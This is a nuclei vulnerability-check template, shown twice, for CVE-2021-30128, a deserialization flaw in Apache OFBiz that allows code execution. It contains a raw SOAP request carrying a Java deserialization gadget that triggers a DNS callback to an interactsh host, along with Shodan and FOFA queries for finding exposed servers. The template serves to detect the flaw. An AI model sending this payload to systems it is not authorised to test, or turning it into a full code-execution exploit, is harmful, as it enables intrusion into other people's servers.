nuclei-templates/cves/2021/CVE-2021-30128.yaml

id: CVE-2021-30128

info:
  name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
  author: For3stCo1d
  severity: critical
  description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30128
    - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
  metadata:
    shodan-query: OFBiz.Visitor=
    fofa-query: app="Apache_OFBiz"
  tags: cve,cve2021,apache,ofbiz,deserialization,rce

requests:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
          <soapenv:Header/>  
            <soapenv:Body>
              <ser>
                <map-Map>
                  <map-Entry>
                    <map-Key>
                      <cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
                    </map-Key>  
                  <map-Value>  
                <std-String/>
                </map-Value>
                </map-Entry>
              </map-Map>
              </ser>
            </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "errorMessage"
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`id: CVE-2021-30128`

			`info:`
			`name: Apache OFBiz <17.12.07 - Arbitrary Code Execution`
			`author: For3stCo1d`
			`severity: critical`
			`description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-30128`
			`- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E`
			`metadata:`
			`shodan-query: OFBiz.Visitor=`
			`fofa-query: app="Apache_OFBiz"`
			`tags: cve,cve2021,apache,ofbiz,deserialization,rce`

			`requests:`
			`- raw:`
			`- \|`
			`POST /webtools/control/SOAPService HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/xml`

			`<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">`
			`<soapenv:Header/>`
			`<soapenv:Body>`
			`<ser>`
			`<map-Map>`
			`<map-Entry>`
			`<map-Key>`
			`<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>`
			`</map-Key>`
			`<map-Value>`
			`<std-String/>`
			`</map-Value>`
			`</map-Entry>`
			`</map-Map>`
			`</ser>`
			`</soapenv:Body>`
			`</soapenv:Envelope>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "dns"`

			`- type: word`
			`part: body`
			`words:`
			`- "errorMessage"`